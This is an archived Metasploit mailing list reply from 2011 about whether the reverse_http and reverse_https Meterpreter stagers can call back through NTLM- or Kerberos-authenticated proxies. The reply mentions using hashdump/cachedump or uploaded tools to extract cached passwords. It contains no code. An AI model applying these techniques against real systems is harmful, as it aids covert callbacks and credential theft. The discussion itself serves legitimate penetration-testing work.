Metasploit mailing list archives
Re: New Meterpreter HTTP/HTTPS Communication
From: HD Moore <hdm () metasploit com>
Date: Wed, 29 Jun 2011 10:53:24 -0500
On 6/29/2011 10:41 AM, Matthew Presson wrote:
I just finished reading the recent post discussing the new reverse_http and reverse_https stagers, but after reading it a couple of questions popped into my head. HD mentions that: These payloads use the WinInet API and will leverage any proxy or authentication settings the user has configured for internet access. What if the compromised machine is joined to a domain, and the proxy servers are configured to use NTLM or Kerberos to authenticate the client? From my understanding, in these situations the user doesn't actually configure a credential set to use to authenticate to the proxy. The authentication happens behind the scenes. So, in this scenario would it still be possible to use this payload to connect back through a proxy to the attacker's machine? And, if I the proxy does use NTLM or Kerberos, wouldn't it also be prudent to harvest any tokens used during the authentication process to potentially penetrate further into the network? If possible, it would be a really nice feature to just return those tokens automatically and store them as loot.
Systems that use transparent credential passing to the proxy will pass this on to the Meterpreter payload going through these two new stagers. Keep in mind that the initial stager has to be *small* in order for it to be any use with most exploits. The reverse_https stager is only about 350 bytes before you add the callback URL. Once you have the full Meterpreter payload loaded, you can use things like hashdump/cachedump or even upload your own tools to suck out the cached passwords. Since you typically have the token of the user running the payload already, this tends to be overkill. -HD _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- New Meterpreter HTTP/HTTPS Communication Matthew Presson (Jun 29)
- Re: New Meterpreter HTTP/HTTPS Communication HD Moore (Jun 29)
- Re: New Meterpreter HTTP/HTTPS Communication Matthew Presson (Jun 29)
- Re: New Meterpreter HTTP/HTTPS Communication HD Moore (Jun 29)